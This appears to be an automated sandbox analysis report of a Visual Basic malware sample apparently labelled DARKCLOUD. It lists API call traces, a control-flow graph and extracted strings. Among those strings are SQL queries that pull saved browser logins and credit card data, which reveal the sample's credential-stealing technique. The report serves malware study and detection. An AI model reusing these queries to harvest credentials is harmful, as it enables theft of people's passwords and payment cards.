                                                          • #529.MSVBVM60(00004008,00000064), ref: 0041D388
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D212
                                                            • Part of subcall function 0042DDC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,00000002,?,?,?), ref: 0042DF0A
                                                            • Part of subcall function 0042DDC0: __vbaStrCopy.MSVBVM60 ref: 0042DF29
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(0042DF6C), ref: 0042DF65
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D1C8
                                                            • Part of subcall function 0041EE80: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0041EE9E
                                                            • Part of subcall function 0041EE80: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6), ref: 0041EECE
                                                            • Part of subcall function 0041EE80: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6), ref: 0041EEEA
                                                            • Part of subcall function 0041EE80: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004030D6), ref: 0041EEFE
                                                            • Part of subcall function 0041EE80: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6), ref: 0041EF0C
                                                            • Part of subcall function 0041EE80: __vbaStrMove.MSVBVM60 ref: 0041EF2B
                                                            • Part of subcall function 0041EE80: __vbaStrMove.MSVBVM60(?,?), ref: 0041EF43
                                                            • Part of subcall function 0041EE80: __vbaStrMove.MSVBVM60(00000000), ref: 0041EF64
                                                            • Part of subcall function 0041EE80: #716.MSVBVM60(?,00000000), ref: 0041EF6F
                                                            • Part of subcall function 0041EE80: __vbaObjVar.MSVBVM60(?), ref: 0041EF79
                                                            • Part of subcall function 0041EE80: __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 0041EF84
                                                            • Part of subcall function 0041EE80: __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,?), ref: 0041EFA4
                                                            • Part of subcall function 0041EE80: __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 0041EFB0
                                                            • Part of subcall function 0041EE80: __vbaChkstk.MSVBVM60 ref: 0041EFD0
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CBFF
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041CBAC
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaVarMove.MSVBVM60(?,00000001), ref: 0041C81B
                                                            • Part of subcall function 004341C0: __vbaStr2Vec.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6,0041CF00), ref: 00434202
                                                            • Part of subcall function 004341C0: __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6,0041CF00), ref: 00434212
                                                            • Part of subcall function 004341C0: __vbaStr2Vec.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6,0041CF00), ref: 00434219
                                                            • Part of subcall function 004341C0: __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6,0041CF00), ref: 00434223
                                                            • Part of subcall function 004341C0: __vbaSetSystemError.MSVBVM60(00402CD0,0041CF00,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6,0041CF00), ref: 00434234
                                                            • Part of subcall function 004341C0: __vbaSetSystemError.MSVBVM60(00402CD0,0041CF00,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6,0041CF00), ref: 0043424C
                                                            • Part of subcall function 004341C0: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 0043426F
                                                            • Part of subcall function 004341C0: __vbaAryLock.MSVBVM60(?,?), ref: 00434280
                                                            • Part of subcall function 004341C0: __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043429F
                                                            • Part of subcall function 004341C0: __vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 004342C5
                                                            • Part of subcall function 004341C0: __vbaAryUnlock.MSVBVM60(?), ref: 004342CB
                                                          • __vbaSetSystemError.MSVBVM60(?), ref: 0041CD0C
                                                          • #645.MSVBVM60(00004008,00000000,00000064), ref: 0041CD54
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CD62
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0041CD6E
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041CD89
                                                          • __vbaStrCopy.MSVBVM60(?), ref: 0041CDC3
                                                          • __vbaFreeStr.MSVBVM60(?,?), ref: 0041CDE5
                                                          • __vbaSetSystemError.MSVBVM60(?), ref: 0041CE04
                                                          • __vbaVarMove.MSVBVM60(?,00000000), ref: 0041CE45
                                                          • __vbaStrMove.MSVBVM60(?,00000001), ref: 0041CE68
                                                          • __vbaStrCat.MSVBVM60(004055A8,00000000), ref: 0041CE74
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CE82
                                                          • __vbaStrMove.MSVBVM60(?,00000002,00000000), ref: 0041CE9F
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041CEA6
                                                          • __vbaVarMove.MSVBVM60 ref: 0041CEC5
                                                            • Part of subcall function 00434130: __vbaSetSystemError.MSVBVM60(?,004030D6,?,?,?,?,?,00000000,004030D6), ref: 00434170
                                                            • Part of subcall function 00434130: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 00434187
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041D3A5
                                                          • __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 0041D3C4
                                                          • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041D3D0
                                                          • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041D3E4
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041D3F0
                                                          • __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041D41C
                                                          • __vbaStrToAnsi.MSVBVM60(?,?,?,?), ref: 0041D43E
                                                          • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0041D455
                                                          • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041D469
                                                          • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041D47D
                                                          • __vbaVarMove.MSVBVM60 ref: 0041D48C
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D4A2
                                                          • __vbaSetSystemError.MSVBVM60(?), ref: 0041D4C1
                                                          • #558.MSVBVM60(?), ref: 0041D4CB
                                                          • __vbaSetSystemError.MSVBVM60(?), ref: 0041D506
                                                          • __vbaI2I4.MSVBVM60 ref: 0041D51B
                                                            • Part of subcall function 00434500: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 0043453F
                                                            • Part of subcall function 00434500: __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 0043454B
                                                            • Part of subcall function 00434500: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 00434556
                                                            • Part of subcall function 00434500: __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00000000,004030D6), ref: 0043455F
                                                          • #529.MSVBVM60(00004008), ref: 0041ECAF
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?,0041EE5E), ref: 0041ED9D
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041EDAF
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041EDBE
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041EDCD
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041EDDC
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041EDE5
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041EDEE
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EDF7
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041EE03
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EE0C
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041EE15
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041EE1E
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EE27
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EE33
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EE3F
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EE4B
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041EE57
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Error$CopySystem$List$Chkstk$Destruct$AnsiUnicode$#716BoundsBstrGenerateLock$#516#529#631BoolCallLateNullRedimStr2UnlockZero$#537#558#608#632#644#645#712AddrefLboundUbound
                                                          • String ID: 007758$013B331C3810262F625E4C$024668$1B331E06210D113D2E1A39794F46$33250134392504126B5048$8V@$===============DARKCLOUD===============$Card Number: $Card Type: $CopyFile$Expiry Date; $HvFifFDbwWSESPfuPWaeSKl$ItwXjeKuthVRdpXyikTUBGFniKETOLdVtYpxoTfOnqQ$Login Data$Name on Card: $SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$SELECT origin_url, username_value, password_value FROM logins$SELECT origin_url, username_value, password_value, length(password_value) FROM logins$Scripting.FileSystemObject$TcDrGNJvvKjh$Url : $Web Data$\LoggraNoUCYctgwnrtnRFCefIupAVHcOBQqsTNNMrZheterostracan$\WebData$b$card_number_encrypted$d$expiration_month\expiration_year$fZCnjHnpIGuWYufYFuJTsZzMYQpNVmCSBggClUwgmL$lTHVnVqKJBd$name_on_card$username_value
                                                          • API String ID: 102252830-1045776294
                                                          • Opcode ID: 28927cd90c74e004a20e069f97b2961b6eacb11fc04b6395372ac42a25ae0287
                                                          • Instruction ID: 01fe39b194a8a2267bf08dea85a880b09ee330dfa5b6df1433968e31978d050b
                                                          • Opcode Fuzzy Hash: 28927cd90c74e004a20e069f97b2961b6eacb11fc04b6395372ac42a25ae0287
                                                          • Instruction Fuzzy Hash: 793309B5900218DFDB15DF90DD88BDEB7B8BB48304F0085EAE24AB7260DB745A89CF54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1656 4216e0-4217d3 __vbaChkstk __vbaAryConstruct2 * 2 __vbaOnError __vbaStrCopy call 42f340 __vbaAryMove __vbaFreeStr __vbaForEachAry 1659 4218a5-4218ac 1656->1659 1660 4218b2-4218ca __vbaStrCmp 1659->1660 1661 4217d8-42182b __vbaStrErrVarCopy __vbaStrMove __vbaInStr __vbaFreeStr 1659->1661 1664 4218d0-421a9d __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 #716 __vbaVarZero __vbaFreeStrList __vbaChkstk __vbaVarLateMemCallLd __vbaStrVarMove __vbaStrMove __vbaFreeVar __vbaStrCopy call 42ecb0 1660->1664 1665 421c1a-421c2d __vbaLenBstrB 1660->1665 1662 42187e-42189f __vbaNextEachAry 1661->1662 1663 42182d-42187c __vbaStrErrVarCopy __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr __vbaExitEachAry 1661->1663 1662->1659 1663->1660 1681 421aa2-421bdb __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 #712 __vbaStrMove __vbaFreeStrList #712 __vbaStrMove __vbaLenBstr 1664->1681 1666 421c34-421c50 __vbaInStr 1665->1666 1667 421c2f 1665->1667 1671 421c52-421c62 1666->1671 1672 421c64-421c6b 1666->1672 1670 42380b-4239b3 __vbaAryUnlock * 2 __vbaFreeVarList __vbaAryDestruct * 2 __vbaFreeStr * 2 __vbaAryDestruct __vbaFreeStr * 2 __vbaAryDestruct __vbaFreeVar __vbaAryDestruct __vbaFreeStr __vbaAryDestruct __vbaFreeStr 1667->1670 1675 421c74-421d3a __vbaStrCopy call 42ecb0 __vbaStrMove #520 __vbaStrCopy __vbaStrMove call 42ddc0 1671->1675 1672->1675 1684 421d48-421d4e __vbaGenerateBoundsError 1675->1684 1685 421d3c-421d46 1675->1685 1688 421be1-421c14 #617 __vbaStrVarMove __vbaStrMove __vbaFreeVar 1681->1688 1689 4239c8-4239cf __vbaErrorOverflow 1681->1689 1687 421d54-421eac __vbaVarAdd __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove #520 __vbaStrCopy __vbaStrMove call 42ddc0 1684->1687 1685->1687 1694 421eba-421ec0 __vbaGenerateBoundsError 1687->1694 1695 421eae-421eb8 1687->1695 1688->1665 1696 421ec6-42201e __vbaVarAdd __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove #520 __vbaStrCopy __vbaStrMove call 42ddc0 1694->1696 1695->1696 1701 422020-42202a 1696->1701 1702 42202c-422032 __vbaGenerateBoundsError 1696->1702 1703 422038-422146 __vbaVarAdd __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove 1701->1703 1702->1703 1706 422154-42215a __vbaGenerateBoundsError 1703->1706 1707 422148-422152 1703->1707 1708 422160-42223f call 42ddc0 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove 1706->1708 1707->1708 1713 422241-42224b 1708->1713 1714 42224d-422253 __vbaGenerateBoundsError 1708->1714 1715 422259-422338 call 42ddc0 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove 1713->1715 1714->1715 1720 422346-42234c __vbaGenerateBoundsError 1715->1720 1721 42233a-422344 1715->1721 1722 422352-4223f6 call 42ddc0 __vbaStrMove __vbaStrCopy __vbaFreeStrList 1720->1722 1721->1722 1722->1670 1726 4223fc-422414 1722->1726 1727 422422-422428 __vbaGenerateBoundsError 1726->1727 1728 422416-422420 1726->1728 1729 42242e-422496 #645 __vbaStrMove __vbaStrCmp __vbaFreeStr 1727->1729 1728->1729 1730 422498 1729->1730 1731 42249d-4224c5 1729->1731 1732 4237ff-423806 1730->1732 1733 4224d3-4224d9 __vbaGenerateBoundsError 1731->1733 1734 4224c7-4224d1 1731->1734 1735 4224df-42251c call 42f340 __vbaAryMove 1733->1735 1734->1735 1738 422522-42254d __vbaForEachAry 1735->1738 1739 42370e-4237f9 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat #529 __vbaFreeStrList __vbaFreeVar 1735->1739 1740 423701-423708 1738->1740 1739->1732 1740->1739 1742 422552-42256a 1740->1742 1744 422578-42257e __vbaGenerateBoundsError 1742->1744 1745 42256c-422576 1742->1745 1747 422584-422987 __vbaVarAdd __vbaStrVarMove __vbaStrMove __vbaFreeVar #716 __vbaVarZero __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaChkstk * 2 __vbaObjVar __vbaLateMemCall __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove call 424690 __vbaStrMove __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaInStrVar __vbaBoolVarNull __vbaFreeStrList __vbaFreeVarList 1744->1747 1745->1747 1763 422a3c-422d14 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 call 4249d0 __vbaStrMove __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 #712 __vbaStrMove call 4324f0 __vbaStrMove __vbaFreeStrList 1747->1763 1764 42298d-422a37 __vbaStrVarVal #709 __vbaLenVar __vbaVarSub __vbaI4Var #619 __vbaStrVarMove __vbaStrMove __vbaFreeStr __vbaFreeVar 1747->1764 1765 422d17-423322 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 call 4249d0 __vbaStrMove __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 call 4249d0 __vbaStrMove __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 #712 __vbaStrMove call 4324f0 __vbaStrMove __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove * 2 #712 __vbaStrMove call 4324f0 __vbaStrMove __vbaFreeStrList call 424bf0 __vbaStrMove __vbaStrCmp * 2 1763->1765 1764->1765 1816 4236da-4236fb __vbaNextEachAry 1765->1816 1817 423328-4236d7 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove __vbaStrCopy __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1765->1817 1816->1740 1817->1816
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 004216FE
                                                          • __vbaAryConstruct2.MSVBVM60(?,0040A2FC,00000008,?,?,?,00000000,004030D6), ref: 00421730
                                                          • __vbaAryConstruct2.MSVBVM60(?,0040A2FC,00000008,?,?,?,00000000,004030D6), ref: 00421741
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6), ref: 00421750
                                                          • __vbaAryMove.MSVBVM60(?,?,?,0043D064,?,?,?,00000000,004030D6), ref: 00421793
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004030D6), ref: 0042179F
                                                          • __vbaForEachAry.MSVBVM60(00000008,?,?,?,?,?,?,?,00000000,004030D6), ref: 004217C7
                                                          • __vbaStrErrVarCopy.MSVBVM60(?,00000001), ref: 004217E5
                                                          • __vbaStrMove.MSVBVM60 ref: 004217F3
                                                          • __vbaInStr.MSVBVM60(00000000,Foxmail,00000000), ref: 00421801
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042181C
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 00421838
                                                          • __vbaStrMove.MSVBVM60 ref: 00421846
                                                          • __vbaStrCat.MSVBVM60(004055A8,00000000), ref: 00421852
                                                          • __vbaStrMove.MSVBVM60 ref: 0042185D
                                                          • __vbaFreeStr.MSVBVM60 ref: 00421869
                                                          • __vbaExitEachAry.MSVBVM60(?), ref: 00421876
                                                          • __vbaStrCmp.MSVBVM60(00405638,?), ref: 004218C2
                                                          • __vbaStrCopy.MSVBVM60 ref: 004218E2
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004218FC
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042190D
                                                          • __vbaStrMove.MSVBVM60 ref: 00421935
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00421956
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00421980
                                                          • #716.MSVBVM60(?,00000000), ref: 0042198E
                                                          • __vbaVarZero.MSVBVM60 ref: 004219A0
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 004219DE
                                                          • __vbaChkstk.MSVBVM60 ref: 00421A07
                                                          • __vbaVarLateMemCallLd.MSVBVM60(?,?,RegRead,00000001), ref: 00421A46
                                                          • __vbaStrVarMove.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 00421A50
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 00421A5B
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 00421A67
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00421AAA
                                                          • __vbaStrCopy.MSVBVM60 ref: 00421ABB
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00421B04
                                                          • __vbaStrMove.MSVBVM60(00405638,00000001,000000FF,00000000), ref: 00421B37
                                                          • #712.MSVBVM60(?,00000000), ref: 00421B42
                                                          • __vbaStrMove.MSVBVM60 ref: 00421B4D
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 00421B7F
                                                          • #712.MSVBVM60(?,00409DD4,00405638,00000001,000000FF,00000000), ref: 00421BA3
                                                          • __vbaStrMove.MSVBVM60 ref: 00421BAE
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 00421BD2
                                                          • #617.MSVBVM60(?,00004008,-00000002), ref: 00421BF0
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 00421BFD
                                                          • __vbaStrMove.MSVBVM60 ref: 00421C08
                                                          • __vbaFreeVar.MSVBVM60 ref: 00421C14
                                                          • __vbaLenBstrB.MSVBVM60(?), ref: 00421C25
                                                          • __vbaInStr.MSVBVM60(00000000,00409DDC,?,00000001), ref: 00421C48
                                                          • __vbaStrCopy.MSVBVM60 ref: 00421C86
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00421CA0
                                                          • #520.MSVBVM60(?,00004008), ref: 00421CC7
                                                          • __vbaStrCopy.MSVBVM60 ref: 00421CD8
                                                          • __vbaStrMove.MSVBVM60 ref: 00421D00
                                                          • __vbaStrMove.MSVBVM60 ref: 00421AE3
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrCopy.MSVBVM60 ref: 00421A90
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6), ref: 00421768
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042F35E
                                                            • Part of subcall function 0042ECB0: __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042F38E
